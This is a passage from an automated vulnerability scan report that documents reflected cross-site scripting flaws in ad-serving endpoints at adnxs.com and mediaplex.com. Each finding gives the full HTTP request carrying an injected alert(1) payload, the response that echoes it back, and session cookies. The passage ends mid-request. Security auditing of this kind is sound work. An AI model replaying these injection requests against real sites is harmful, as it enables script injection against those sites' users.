nVkZ2VyZXBvcnQuY29tL5gCuBfAAgTIAquCpQ6oAwHoA_sD6AOMA-gDmQP1AwAAAsT1AyAAAAA%26num%3D1%26sig%3DAGiWqtw_eL9DBqAZ0PN7cEKlsXl5DladFA%26client%3Dca-pub-0502717091279373%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=600&slotname=6309509649&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297648551504&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297648551509&frm=1&adk=3377972691&ga_vid=1250234459.1297648552&ga_sid=1297648552&ga_hid=1841793208&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2928058547&eid=33895298&fu=0&ifi=1&dtd=8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEgj8iAEQChgBIAEoATDcjeLqBAoSCL-PARAKGAEgASgBMIuN4uoEEKGO4uoEGAQ.; acb717022=5_[r^208WMvBlUw20/dRC(+RZ?enc=q6qqqqqqCkAAAAAAAAAIQAAAAAAAAAhAFo_mI4TiCkDDEDl9Pd8NQOEABvpoyVx2BWHfHSmrEEIhh1hNAAAAAMs4AwA3AQAANQEAAAIAAADifwEAploAAAEAAABVU0QAVVNEACwB-gBYDgAA0wgBAgUCAAUAAAAACRsvXwAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+3338%2C+1297647393%29%3Buf%28%27c%27%2C+15498%2C+1297647393%29%3Buf%28%27r%27%2C+98274%2C+1297647393%29%3Bppv%282932%2C+%278528913247041356001%27%2C+1297647393%2C+1297733793%2C+15498%2C+23206%29%3B&cnd=!bhaubAiKeRDi_wUYACCmtQEoADGprN67Pd8NQEITCAAQABgAIAEo_v__________AUgAUABY2BxgAGi1Ag..; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:55:52 GMT
Content-Length: 1077

document.write('<a href="http://ib.adnxs.com/click/AAAAAAAACEAAAAAAAAAIQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAAuxe_kgAAAAA./cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00/referrer=http%3A%2F%2Fwww.drudgereport.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIB
...[SNIP]...

1.177. http://ib.adnxs.com/ab [custom_macro parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e306'%3balert(1)//5bb5c06a74 was submitted in the custom_macro parameter. This input was echoed as 7e306';alert(1)//5bb5c06a74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=ZmZmZmZmAEBaIEHxY8z8PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBAgUCAAIAAAAATCCnlAAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+10005%2C+1297649601%29%3Buf%28%27c%27%2C+49470%2C+1297649601%29%3Buf%28%27r%27%2C+177675%2C+1297649601%29%3Bppv%289163%2C+%276878292452198102128%27%2C+1297649601%2C+1297822401%2C+49470%2C+25661%29%3B&cnd=!9BV8Wwi-ggMQi-wKGAAgvcgBKOMJMWZmZmZmZgBAQhMIABAAGAAgASj-__________8BSABQAFjXNmAAaOQC&referrer=http://www.drudgereport.com/&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-17e306'%3balert(1)//5bb5c06a74&pp=AAABLiHxjW2aHsAUrhXeXy7HnjQEzy6mEJhGsA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0K-0oEi9BqslYpw4GThC965ufnbUW7BwJm5Gu783YwBw91KDpWzUohmJbpm2okwppa7yYI0lOlyW9fubMZ7jaRy0-IPoOVpmsh49NdEahLnmrg4ToC-HK_DZHW7Ae8cfPqIKT3MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEQjMeBAKGAEgASgBMIue4uoEChII_IgBEAoYASABKAEw3I3i6gQKEgi_jwEQChgBIAEoATCLjeLqBBCLnuLqBBgF; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 02:14:10 GMT
Content-Length: 1488

document.write('<a href="http://ib.adnxs.com/click/5zORMa3h-z97FK5H4Xr4PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=7BSW&n_cid=49470&crid=flower_vday_160x600_1999jpg&n_crid=177675&mpm=CPM&n_g=u&n_a=0&aids=7BSW-17e306';alert(1)//5bb5c06a74&n_price=1.742597&n_bust=1297649601&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-Xgraph-_-xvday1999-_-vday%26cm_mmca1%
...[SNIP]...

1.178. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca016'%3balert(1)//5fa073185f6 was submitted in the redir parameter. This input was echoed as ca016';alert(1)//5fa073185f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=311&inv_code=cm.dailymail&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.dailymail%2Fron_052010%3Bnet%3Dcm%3Bu%3D%2Ccm-8533902_1297647301%2C11d765b6a10b1b3%2Chealth%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D572356%3Bcontx%3Dhealth%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.rdst11%3Bbtg%3Dcm.rdst12%3Bbtg%3Dcm.polit_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.shop_h%3Bbtg%3Dcm.tech_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa5%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.af1%3Bbtg%3Dmm.ai1%3Bbtg%3Dmm.al5%3Bbtg%3Dmm.am5%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.as1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dan.51%3Bbtg%3Dan.5%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dex.49%3Bbtg%3Ddx.16%3Bbtg%3Dqc.a%3Bord%3D3412338%3Fca016'%3balert(1)//5fa073185f6 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIv48BEAoYASABKAEwi43i6gQQi43i6gQYAA..; uuid2=4760492999213801733; anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIjngQChgBIAEoATCKjuLqBAoSCL-PARAKGAEgASgBMIuN4uoEEIqO4uoEGAE.; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb79863=5_[r^208WM>bcYx_nG*.:^g+C?enc=ZmZmZmZmAECE61G4HoX9PwAAAAAAAAhAhOtRuB6F_T9mZmZmZmYAQDqrGdMotboaBWHfHSmrEEIKh1hNAAAAAMs4AwA3AQAAZAEAAAIAAACILwMAploAAAEAAABVU0QAVVNEACwB-gBYDgAAUAcBAgUCAAUAAAAAqhzHbAAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+10005%2C+1297647370%29%3Buf%28%27c%27%2C+49470%2C+1297647370%29%3Buf%28%27r%27%2C+208776%2C+1297647370%29%3Bppv%289163%2C+%271926050977599302458%27%2C+1297647370%2C+1297820170%2C+49470%2C+23206%29%3B&cnd=!txQdIwi-ggMQiN8MGAAgprUBKAAxZmZmZmZmAEBCEwgAEAAYACABKP7__________wFIAFAAWNgcYABo5AI.&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mCZ#-r-!h!'HeE4TR!f?sYIm%X3Zp'bpV[vypRsrn$Z9K/W<P_ZTLv<7h(.63:>>Yf$^-@VYpnGhEl:Cu8vlI:i:B2V3rfi<wSZ4:l'jt8^l@>+J-D!CW=-L5P3V:*cp*s6J2Dm-cE(PSZ6)?.HX%HgNom6fYB5AqBM>35QZDs7IAdTV:i(Zen>alciVCDxC?5e0du@Tn2!mB9m/p):MJN/xr/?SGEu6U+H0tK(AOZTn)XlSDJOj2rk/[c2J<xD?g!Jz12S<Ls:>]w:Ml[DhVWJ2-P1shhC:7QXbK-0fJ4l(vmb#mn<(-w>85h!YrKc7GvAnY_M[TK-MHJ.k53yQv$*WQwj:$fp`yb3(dE==5Z#4!RNdfO'HPL9bHg$F]0Xd>Ku0zL#)BVcXlLTo3_OCCWhQ:W3Qt(h>3.z(qrY.gKwpFehGeYv!m*Q#xs(Q<ag5cC`d]p[x%e=mX)BjLqk05tsu%UmgWaNp$b:cIF+n03`_3=ASFI/MNbyctA0]?x4V-:Xzq!0'I1a'.Q/N8QTJK))xnNxMcwDX5>pKj=p]ww++74CZ1uUBI)2)rwmSf`90S(aG*0d+%d[5Qz[RKvWH?k.V%9jMiWo0QW:]S$ZP>%0m7qzHdJf3UzM-%DF/wBu=aWG>:/wu+aFbayBOlb0r+WF(LbE>MxDP9Vs<O^>[S6R!vz!=j?E$USn+; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 14 Feb 2011 01:36:10 GMT
Content-Length: 1187

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.dailymail/ron_052010;net=cm;u=,cm-8533902_1297647301,11d765b6a10b1b3,health,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa
...[SNIP]...
g=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3412338?ca016';alert(1)//5fa073185f6">
...[SNIP]...

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90d9f"%3balert(1)//d7cf6a05065 was submitted in the mpck parameter. This input was echoed as 90d9f";alert(1)//d7cf6a05065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D572158616790d9f"%3balert(1)//d7cf6a05065&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:15 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6686
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
e=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-4?mpt=572158616790d9f";alert(1)//d7cf6a05065\" target=\"_blank\">
...[SNIP]...

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fb5"%3balert(1)//6fd56155f2e was submitted in the mpvc parameter. This input was echoed as e3fb5";alert(1)//6fd56155f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5"%3balert(1)//6fd56155f2e&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:23 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6662
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5";alert(1)//6fd56155f2ehttp://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&clickTag=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,7773
...[SNIP]...

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de4ec"%3balert(1)//371d15fe709 was submitted in the placementid parameter. This input was echoed as de4ec";alert(1)//371d15fe709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014de4ec"%3balert(1)//371d15fe709& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
